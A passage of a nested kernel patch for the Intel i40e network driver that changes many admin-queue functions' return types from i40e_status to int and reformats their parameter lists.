+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_update_vsi_parameters);
+@@ -2336,15 +2191,15 @@ i40e_status i40e_aq_update_vsi_params(struct i40e_hw *hw,
+  *
+  * Fill the buf with switch configuration returned from AdminQ command
+  **/
+-i40e_status i40e_aq_get_switch_config(struct i40e_hw *hw,
+-				struct i40e_aqc_get_switch_config_resp *buf,
+-				u16 buf_size, u16 *start_seid,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_switch_config(struct i40e_hw *hw,
++			      struct i40e_aqc_get_switch_config_resp *buf,
++			      u16 buf_size, u16 *start_seid,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_switch_seid *scfg =
+ 		(struct i40e_aqc_switch_seid *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_get_switch_config);
+@@ -2370,15 +2225,15 @@ i40e_status i40e_aq_get_switch_config(struct i40e_hw *hw,
+  *
+  * Set switch configuration bits
+  **/
+-enum i40e_status_code i40e_aq_set_switch_config(struct i40e_hw *hw,
+-						u16 flags,
+-						u16 valid_flags, u8 mode,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_switch_config(struct i40e_hw *hw,
++			      u16 flags,
++			      u16 valid_flags, u8 mode,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_switch_config *scfg =
+ 		(struct i40e_aqc_set_switch_config *)&desc.params.raw;
+-	enum i40e_status_code status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_switch_config);
+@@ -2407,16 +2262,16 @@ enum i40e_status_code i40e_aq_set_switch_config(struct i40e_hw *hw,
+  *
+  * Get the firmware version from the admin queue commands
+  **/
+-i40e_status i40e_aq_get_firmware_version(struct i40e_hw *hw,
+-				u16 *fw_major_version, u16 *fw_minor_version,
+-				u32 *fw_build,
+-				u16 *api_major_version, u16 *api_minor_version,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_firmware_version(struct i40e_hw *hw,
++				 u16 *fw_major_version, u16 *fw_minor_version,
++				 u32 *fw_build,
++				 u16 *api_major_version, u16 *api_minor_version,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_version *resp =
+ 		(struct i40e_aqc_get_version *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_get_version);
+ 
+@@ -2446,14 +2301,14 @@ i40e_status i40e_aq_get_firmware_version(struct i40e_hw *hw,
+  *
+  * Send the driver version to the firmware
+  **/
+-i40e_status i40e_aq_send_driver_version(struct i40e_hw *hw,
++int i40e_aq_send_driver_version(struct i40e_hw *hw,
+ 				struct i40e_driver_version *dv,
+ 				struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_driver_version *cmd =
+ 		(struct i40e_aqc_driver_version *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 	u16 len;
+ 
+ 	if (dv == NULL)
+@@ -2488,9 +2343,9 @@ i40e_status i40e_aq_send_driver_version(struct i40e_hw *hw,
+  *
+  * Side effect: LinkStatusEvent reporting becomes enabled
+  **/
+-i40e_status i40e_get_link_status(struct i40e_hw *hw, bool *link_up)
++int i40e_get_link_status(struct i40e_hw *hw, bool *link_up)
+ {
+-	i40e_status status = 0;
++	int status = 0;
+ 
+ 	if (hw->phy.get_link_info) {
+ 		status = i40e_update_link_info(hw);
+@@ -2509,10 +2364,10 @@ i40e_status i40e_get_link_status(struct i40e_hw *hw, bool *link_up)
+  * i40e_update_link_info - update status of the HW network link
+  * @hw: pointer to the hw struct
+  **/
+-noinline_for_stack i40e_status i40e_update_link_info(struct i40e_hw *hw)
++noinline_for_stack int i40e_update_link_info(struct i40e_hw *hw)
+ {
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+-	i40e_status status = 0;
++	int status = 0;
+ 
+ 	status = i40e_aq_get_link_info(hw, true, NULL, NULL);
+ 	if (status)
+@@ -2559,19 +2414,19 @@ noinline_for_stack i40e_status i40e_update_link_info(struct i40e_hw *hw)
+  * This asks the FW to add a VEB between the uplink and downlink
+  * elements.  If the uplink SEID is 0, this will be a floating VEB.
+  **/
+-i40e_status i40e_aq_add_veb(struct i40e_hw *hw, u16 uplink_seid,
+-				u16 downlink_seid, u8 enabled_tc,
+-				bool default_port, u16 *veb_seid,
+-				bool enable_stats,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_add_veb(struct i40e_hw *hw, u16 uplink_seid,
++		    u16 downlink_seid, u8 enabled_tc,
++		    bool default_port, u16 *veb_seid,
++		    bool enable_stats,
++		    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_veb *cmd =
+ 		(struct i40e_aqc_add_veb *)&desc.params.raw;
+ 	struct i40e_aqc_add_veb_completion *resp =
+ 		(struct i40e_aqc_add_veb_completion *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 veb_flags = 0;
++	int status;
+ 
+ 	/* SEIDs need to either both be set or both be 0 for floating VEB */
+ 	if (!!uplink_seid != !!downlink_seid)
+@@ -2617,17 +2472,17 @@ i40e_status i40e_aq_add_veb(struct i40e_hw *hw, u16 uplink_seid,
+  * This retrieves the parameters for a particular VEB, specified by
+  * uplink_seid, and returns them to the caller.
+  **/
+-i40e_status i40e_aq_get_veb_parameters(struct i40e_hw *hw,
+-				u16 veb_seid, u16 *switch_id,
+-				bool *floating, u16 *statistic_index,
+-				u16 *vebs_used, u16 *vebs_free,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_veb_parameters(struct i40e_hw *hw,
++			       u16 veb_seid, u16 *switch_id,
++			       bool *floating, u16 *statistic_index,
++			       u16 *vebs_used, u16 *vebs_free,
++			       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_veb_parameters_completion *cmd_resp =
+ 		(struct i40e_aqc_get_veb_parameters_completion *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (veb_seid == 0)
+ 		return I40E_ERR_PARAM;
+@@ -2711,7 +2566,7 @@ i40e_prepare_add_macvlan(struct i40e_aqc_add_macvlan_element_data *mv_list,
+  *
+  * Add MAC/VLAN addresses to the HW filtering
+  **/
+-i40e_status
++int
+ i40e_aq_add_macvlan(struct i40e_hw *hw, u16 seid,
+ 		    struct i40e_aqc_add_macvlan_element_data *mv_list,
+ 		    u16 count, struct i40e_asq_cmd_details *cmd_details)
+@@ -2743,7 +2598,7 @@ i40e_aq_add_macvlan(struct i40e_hw *hw, u16 seid,
+  * It also calls _v2 versions of asq_send_command functions to
+  * get the aq_status on the stack.
+  **/
+-i40e_status
++int
+ i40e_aq_add_macvlan_v2(struct i40e_hw *hw, u16 seid,
+ 		       struct i40e_aqc_add_macvlan_element_data *mv_list,
+ 		       u16 count, struct i40e_asq_cmd_details *cmd_details,
+@@ -2771,15 +2626,16 @@ i40e_aq_add_macvlan_v2(struct i40e_hw *hw, u16 seid,
+  *
+  * Remove MAC/VLAN addresses from the HW filtering
+  **/
+-i40e_status i40e_aq_remove_macvlan(struct i40e_hw *hw, u16 seid,
+-			struct i40e_aqc_remove_macvlan_element_data *mv_list,
+-			u16 count, struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_remove_macvlan(struct i40e_hw *hw, u16 seid,
++		       struct i40e_aqc_remove_macvlan_element_data *mv_list,
++		       u16 count, struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_macvlan *cmd =
+ 		(struct i40e_aqc_macvlan *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 buf_size;
++	int status;
+ 
+ 	if (count == 0 || !mv_list || !hw)
+ 		return I40E_ERR_PARAM;
+@@ -2818,7 +2674,7 @@ i40e_status i40e_aq_remove_macvlan(struct i40e_hw *hw, u16 seid,
+  * It also calls _v2 versions of asq_send_command functions to
+  * get the aq_status on the stack.
+  **/
+-i40e_status
++int
+ i40e_aq_remove_macvlan_v2(struct i40e_hw *hw, u16 seid,
+ 			  struct i40e_aqc_remove_macvlan_element_data *mv_list,
+ 			  u16 count, struct i40e_asq_cmd_details *cmd_details,
+@@ -2866,19 +2722,19 @@ i40e_aq_remove_macvlan_v2(struct i40e_hw *hw, u16 seid,
+  * Add/Delete a mirror rule to a specific switch. Mirror rules are supported for
+  * VEBs/VEPA elements only
+  **/
+-static i40e_status i40e_mirrorrule_op(struct i40e_hw *hw,
+-				u16 opcode, u16 sw_seid, u16 rule_type, u16 id,
+-				u16 count, __le16 *mr_list,
+-				struct i40e_asq_cmd_details *cmd_details,
+-				u16 *rule_id, u16 *rules_used, u16 *rules_free)
++static int i40e_mirrorrule_op(struct i40e_hw *hw,
++			      u16 opcode, u16 sw_seid, u16 rule_type, u16 id,
++			      u16 count, __le16 *mr_list,
++			      struct i40e_asq_cmd_details *cmd_details,
++			      u16 *rule_id, u16 *rules_used, u16 *rules_free)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_delete_mirror_rule *cmd =
+ 		(struct i40e_aqc_add_delete_mirror_rule *)&desc.params.raw;
+ 	struct i40e_aqc_add_delete_mirror_rule_completion *resp =
+ 	(struct i40e_aqc_add_delete_mirror_rule_completion *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 buf_size;
++	int status;
+ 
+ 	buf_size = count * sizeof(*mr_list);
+ 
+@@ -2926,10 +2782,11 @@ static i40e_status i40e_mirrorrule_op(struct i40e_hw *hw,
+  *
+  * Add mirror rule. Mirror rules are supported for VEBs or VEPA elements only
+  **/
+-i40e_status i40e_aq_add_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+-			u16 rule_type, u16 dest_vsi, u16 count, __le16 *mr_list,
+-			struct i40e_asq_cmd_details *cmd_details,
+-			u16 *rule_id, u16 *rules_used, u16 *rules_free)
++int i40e_aq_add_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
++			   u16 rule_type, u16 dest_vsi, u16 count,
++			   __le16 *mr_list,
++			   struct i40e_asq_cmd_details *cmd_details,
++			   u16 *rule_id, u16 *rules_used, u16 *rules_free)
+ {
+ 	if (!(rule_type == I40E_AQC_MIRROR_RULE_TYPE_ALL_INGRESS ||
+ 	    rule_type == I40E_AQC_MIRROR_RULE_TYPE_ALL_EGRESS)) {
+@@ -2957,10 +2814,11 @@ i40e_status i40e_aq_add_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+  *
+  * Delete a mirror rule. Mirror rules are supported for VEBs/VEPA elements only
+  **/
+-i40e_status i40e_aq_delete_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+-			u16 rule_type, u16 rule_id, u16 count, __le16 *mr_list,
+-			struct i40e_asq_cmd_details *cmd_details,
+-			u16 *rules_used, u16 *rules_free)
++int i40e_aq_delete_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
++			      u16 rule_type, u16 rule_id, u16 count,
++			      __le16 *mr_list,
++			      struct i40e_asq_cmd_details *cmd_details,
++			      u16 *rules_used, u16 *rules_free)
+ {
+ 	/* Rule ID has to be valid except rule_type: INGRESS VLAN mirroring */
+ 	if (rule_type == I40E_AQC_MIRROR_RULE_TYPE_VLAN) {
+@@ -2989,14 +2847,14 @@ i40e_status i40e_aq_delete_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+  *
+  * send msg to vf
+  **/
+-i40e_status i40e_aq_send_msg_to_vf(struct i40e_hw *hw, u16 vfid,
+-				u32 v_opcode, u32 v_retval, u8 *msg, u16 msglen,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_send_msg_to_vf(struct i40e_hw *hw, u16 vfid,
++			   u32 v_opcode, u32 v_retval, u8 *msg, u16 msglen,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_pf_vf_message *cmd =
+ 		(struct i40e_aqc_pf_vf_message *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_send_msg_to_vf);
+ 	cmd->id = cpu_to_le32(vfid);
+@@ -3024,14 +2882,14 @@ i40e_status i40e_aq_send_msg_to_vf(struct i40e_hw *hw, u16 vfid,
+  *
+  * Read the register using the admin queue commands
+  **/
+-i40e_status i40e_aq_debug_read_register(struct i40e_hw *hw,
++int i40e_aq_debug_read_register(struct i40e_hw *hw,
+ 				u32 reg_addr, u64 *reg_val,
+ 				struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_debug_reg_read_write *cmd_resp =
+ 		(struct i40e_aqc_debug_reg_read_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (reg_val == NULL)
+ 		return I40E_ERR_PARAM;
+@@ -3059,14 +2917,14 @@ i40e_status i40e_aq_debug_read_register(struct i40e_hw *hw,
+  *
+  * Write to a register using the admin queue commands
+  **/
+-i40e_status i40e_aq_debug_write_register(struct i40e_hw *hw,
+-					u32 reg_addr, u64 reg_val,
+-					struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_debug_write_register(struct i40e_hw *hw,
++				 u32 reg_addr, u64 reg_val,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_debug_reg_read_write *cmd =
+ 		(struct i40e_aqc_debug_reg_read_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_debug_write_reg);
+ 
+@@ -3090,16 +2948,16 @@ i40e_status i40e_aq_debug_write_register(struct i40e_hw *hw,
+  *
+  * requests common resource using the admin queue commands
+  **/
+-i40e_status i40e_aq_request_resource(struct i40e_hw *hw,
+-				enum i40e_aq_resources_ids resource,
+-				enum i40e_aq_resource_access_type access,
+-				u8 sdp_number, u64 *timeout,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_request_resource(struct i40e_hw *hw,
++			     enum i40e_aq_resources_ids resource,
++			     enum i40e_aq_resource_access_type access,
++			     u8 sdp_number, u64 *timeout,
++			     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_request_resource *cmd_resp =
+ 		(struct i40e_aqc_request_resource *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_request_resource);
+ 
+@@ -3129,15 +2987,15 @@ i40e_status i40e_aq_request_resource(struct i40e_hw *hw,
+  *
+  * release common resource using the admin queue commands
+  **/
+-i40e_status i40e_aq_release_resource(struct i40e_hw *hw,
+-				enum i40e_aq_resources_ids resource,
+-				u8 sdp_number,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_release_resource(struct i40e_hw *hw,
++			     enum i40e_aq_resources_ids resource,
++			     u8 sdp_number,
++			     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_request_resource *cmd =
+ 		(struct i40e_aqc_request_resource *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_release_resource);
+ 
+@@ -3161,15 +3019,15 @@ i40e_status i40e_aq_release_resource(struct i40e_hw *hw,
+  *
+  * Read the NVM using the admin queue commands
+  **/
+-i40e_status i40e_aq_read_nvm(struct i40e_hw *hw, u8 module_pointer,
+-				u32 offset, u16 length, void *data,
+-				bool last_command,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_read_nvm(struct i40e_hw *hw, u8 module_pointer,
++		     u32 offset, u16 length, void *data,
++		     bool last_command,
++		     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_nvm_update *cmd =
+ 		(struct i40e_aqc_nvm_update *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	/* In offset the highest byte must be zeroed. */
+ 	if (offset & 0xFF000000) {
+@@ -3207,14 +3065,14 @@ i40e_aq_read_nvm_exit:
+  *
+  * Erase the NVM sector using the admin queue commands
+  **/
+-i40e_status i40e_aq_erase_nvm(struct i40e_hw *hw, u8 module_pointer,
+-			      u32 offset, u16 length, bool last_command,
+-			      struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_erase_nvm(struct i40e_hw *hw, u8 module_pointer,
++		      u32 offset, u16 length, bool last_command,
++		      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_nvm_update *cmd =
+ 		(struct i40e_aqc_nvm_update *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	/* In offset the highest byte must be zeroed. */
+ 	if (offset & 0xFF000000) {
+@@ -3255,8 +3113,8 @@ static void i40e_parse_discover_capabilities(struct i40e_hw *hw, void *buff,
+ 	u32 number, logical_id, phys_id;
+ 	struct i40e_hw_capabilities *p;
+ 	u16 id, ocp_cfg_word0;
+-	i40e_status status;
+ 	u8 major_rev;
++	int status;
+ 	u32 i = 0;
+ 
+ 	cap = (struct i40e_aqc_list_capabilities_element_resp *) buff;
+@@ -3497,14 +3355,14 @@ static void i40e_parse_discover_capabilities(struct i40e_hw *hw, void *buff,
+  *
+  * Get the device capabilities descriptions from the firmware
+  **/
+-i40e_status i40e_aq_discover_capabilities(struct i40e_hw *hw,
+-				void *buff, u16 buff_size, u16 *data_size,
+-				enum i40e_admin_queue_opc list_type_opc,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_discover_capabilities(struct i40e_hw *hw,
++				  void *buff, u16 buff_size, u16 *data_size,
++				  enum i40e_admin_queue_opc list_type_opc,
++				  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aqc_list_capabilites *cmd;
+ 	struct i40e_aq_desc desc;
+-	i40e_status status = 0;
++	int status = 0;
+ 
+ 	cmd = (struct i40e_aqc_list_capabilites *)&desc.params.raw;
+ 
+@@ -3546,15 +3404,15 @@ exit:
+  *
+  * Update the NVM using the admin queue commands
+  **/
+-i40e_status i40e_aq_update_nvm(struct i40e_hw *hw, u8 module_pointer,
+-			       u32 offset, u16 length, void *data,
+-				bool last_command, u8 preservation_flags,
+-			       struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_update_nvm(struct i40e_hw *hw, u8 module_pointer,
++		       u32 offset, u16 length, void *data,
++		       bool last_command, u8 preservation_flags,
++		       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_nvm_update *cmd =
+ 		(struct i40e_aqc_nvm_update *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	/* In offset the highest byte must be zeroed. */
+ 	if (offset & 0xFF000000) {
+@@ -3599,13 +3457,13 @@ i40e_aq_update_nvm_exit:
+  *
+  * Rearrange NVM structure, available only for transition FW
+  **/
+-i40e_status i40e_aq_rearrange_nvm(struct i40e_hw *hw,
+-				  u8 rearrange_nvm,
+-				  struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_rearrange_nvm(struct i40e_hw *hw,
++			  u8 rearrange_nvm,
++			  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aqc_nvm_update *cmd;
+-	i40e_status status;
+ 	struct i40e_aq_desc desc;
++	int status;
+ 
+ 	cmd = (struct i40e_aqc_nvm_update *)&desc.params.raw;
+ 
+@@ -3639,17 +3497,17 @@ i40e_aq_rearrange_nvm_exit:
+  *
+  * Requests the complete LLDP MIB (entire packet).
+  **/
+-i40e_status i40e_aq_get_lldp_mib(struct i40e_hw *hw, u8 bridge_type,
+-				u8 mib_type, void *buff, u16 buff_size,
+-				u16 *local_len, u16 *remote_len,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_lldp_mib(struct i40e_hw *hw, u8 bridge_type,
++			 u8 mib_type, void *buff, u16 buff_size,
++			 u16 *local_len, u16 *remote_len,
++			 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_lldp_get_mib *cmd =
+ 		(struct i40e_aqc_lldp_get_mib *)&desc.params.raw;
+ 	struct i40e_aqc_lldp_get_mib *resp =
+ 		(struct i40e_aqc_lldp_get_mib *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (buff_size == 0 || !buff)
+ 		return I40E_ERR_PARAM;
+@@ -3689,14 +3547,14 @@ i40e_status i40e_aq_get_lldp_mib(struct i40e_hw *hw, u8 bridge_type,
+  *
+  * Set the LLDP MIB.
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_set_lldp_mib(struct i40e_hw *hw,
+ 		     u8 mib_type, void *buff, u16 buff_size,
+ 		     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aqc_lldp_set_local_mib *cmd;
+-	enum i40e_status_code status;
+ 	struct i40e_aq_desc desc;
++	int status;
+ 
+ 	cmd = (struct i40e_aqc_lldp_set_local_mib *)&desc.params.raw;
+ 	if (buff_size == 0 || !buff)
+@@ -3728,14 +3586,14 @@ i40e_aq_set_lldp_mib(struct i40e_hw *hw,
+  * Enable or Disable posting of an event on ARQ when LLDP MIB
+  * associated with the interface changes
+  **/
+-i40e_status i40e_aq_cfg_lldp_mib_change_event(struct i40e_hw *hw,
+-				bool enable_update,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_cfg_lldp_mib_change_event(struct i40e_hw *hw,
++				      bool enable_update,
++				      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_lldp_update_mib *cmd =
+ 		(struct i40e_aqc_lldp_update_mib *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_lldp_update_mib);
+ 
+@@ -3757,14 +3615,14 @@ i40e_status i40e_aq_cfg_lldp_mib_change_event(struct i40e_hw *hw,
+  * Restore LLDP Agent factory settings if @restore set to True. In other case
+  * only returns factory setting in AQ response.
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_restore_lldp(struct i40e_hw *hw, u8 *setting, bool restore,
+ 		     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_lldp_restore *cmd =
+ 		(struct i40e_aqc_lldp_restore *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (!(hw->flags & I40E_HW_FLAG_FW_LLDP_PERSISTENT)) {
+ 		i40e_debug(hw, I40E_DEBUG_ALL,
+@@ -3794,14 +3652,14 @@ i40e_aq_restore_lldp(struct i40e_hw *hw, u8 *setting, bool restore,
+  *
+  * Stop or Shutdown the embedded LLDP Agent
+  **/
+-i40e_status i40e_aq_stop_lldp(struct i40e_hw *hw, bool shutdown_agent,
+-				bool persist,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_stop_lldp(struct i40e_hw *hw, bool shutdown_agent,
++		      bool persist,
++		      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_lldp_stop *cmd =
+ 		(struct i40e_aqc_lldp_stop *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_lldp_stop);
+ 
+@@ -3829,13 +3687,13 @@ i40e_status i40e_aq_stop_lldp(struct i40e_hw *hw, bool shutdown_agent,
+  *
+  * Start the embedded LLDP Agent on all ports.
+  **/
+-i40e_status i40e_aq_start_lldp(struct i40e_hw *hw, bool persist,
+-			       struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_start_lldp(struct i40e_hw *hw, bool persist,
++		       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_lldp_start *cmd =
+ 		(struct i40e_aqc_lldp_start *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_lldp_start);
+ 
+@@ -3861,14 +3719,14 @@ i40e_status i40e_aq_start_lldp(struct i40e_hw *hw, bool persist,
+  * @dcb_enable: True if DCB configuration needs to be applied
+  *
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_set_dcb_parameters(struct i40e_hw *hw, bool dcb_enable,
+ 			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_dcb_parameters *cmd =
+ 		(struct i40e_aqc_set_dcb_parameters *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (!(hw->flags & I40E_HW_FLAG_FW_LLDP_STOPPABLE))
+ 		return I40E_ERR_DEVICE_NOT_SUPPORTED;
+@@ -3894,12 +3752,12 @@ i40e_aq_set_dcb_parameters(struct i40e_hw *hw, bool dcb_enable,
+  *
+  * Get CEE DCBX mode operational configuration from firmware
+  **/
+-i40e_status i40e_aq_get_cee_dcb_config(struct i40e_hw *hw,
+-				       void *buff, u16 buff_size,
+-				       struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_cee_dcb_config(struct i40e_hw *hw,
++			       void *buff, u16 buff_size,
++			       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+-	i40e_status status;
++	int status;
+ 
+ 	if (buff_size == 0 || !buff)
+ 		return I40E_ERR_PARAM;
+@@ -3925,17 +3783,17 @@ i40e_status i40e_aq_get_cee_dcb_config(struct i40e_hw *hw,
+  * and this function will call cpu_to_le16 to convert from Host byte order to
+  * Little Endian order.
+  **/
+-i40e_status i40e_aq_add_udp_tunnel(struct i40e_hw *hw,
+-				u16 udp_port, u8 protocol_index,
+-				u8 *filter_index,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_add_udp_tunnel(struct i40e_hw *hw,
++			   u16 udp_port, u8 protocol_index,
++			   u8 *filter_index,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_udp_tunnel *cmd =
+ 		(struct i40e_aqc_add_udp_tunnel *)&desc.params.raw;
+ 	struct i40e_aqc_del_udp_tunnel_completion *resp =
+ 		(struct i40e_aqc_del_udp_tunnel_completion *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_add_udp_tunnel);
+ 
+@@ -3956,13 +3814,13 @@ i40e_status i40e_aq_add_udp_tunnel(struct i40e_hw *hw,
+  * @index: filter index
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_del_udp_tunnel(struct i40e_hw *hw, u8 index,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_del_udp_tunnel(struct i40e_hw *hw, u8 index,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_remove_udp_tunnel *cmd =
+ 		(struct i40e_aqc_remove_udp_tunnel *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_del_udp_tunnel);
+ 
+@@ -3981,13 +3839,13 @@ i40e_status i40e_aq_del_udp_tunnel(struct i40e_hw *hw, u8 index,
+  *
+  * This deletes a switch element from the switch.
+  **/
+-i40e_status i40e_aq_delete_element(struct i40e_hw *hw, u16 seid,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_delete_element(struct i40e_hw *hw, u16 seid,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_switch_seid *cmd =
+ 		(struct i40e_aqc_switch_seid *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (seid == 0)
+ 		return I40E_ERR_PARAM;
+@@ -4011,11 +3869,11 @@ i40e_status i40e_aq_delete_element(struct i40e_hw *hw, u16 seid,
+  * recomputed and modified. The retval field in the descriptor
+  * will be set to 0 when RPB is modified.
+  **/
+-i40e_status i40e_aq_dcb_updated(struct i40e_hw *hw,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_dcb_updated(struct i40e_hw *hw,
++			struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_dcb_updated);
+ 
+@@ -4035,15 +3893,15 @@ i40e_status i40e_aq_dcb_updated(struct i40e_hw *hw,
+  *
+  * Generic command handler for Tx scheduler AQ commands
+  **/
+-static i40e_status i40e_aq_tx_sched_cmd(struct i40e_hw *hw, u16 seid,
++static int i40e_aq_tx_sched_cmd(struct i40e_hw *hw, u16 seid,
+ 				void *buff, u16 buff_size,
+-				 enum i40e_admin_queue_opc opcode,
++				enum i40e_admin_queue_opc opcode,
+ 				struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_tx_sched_ind *cmd =
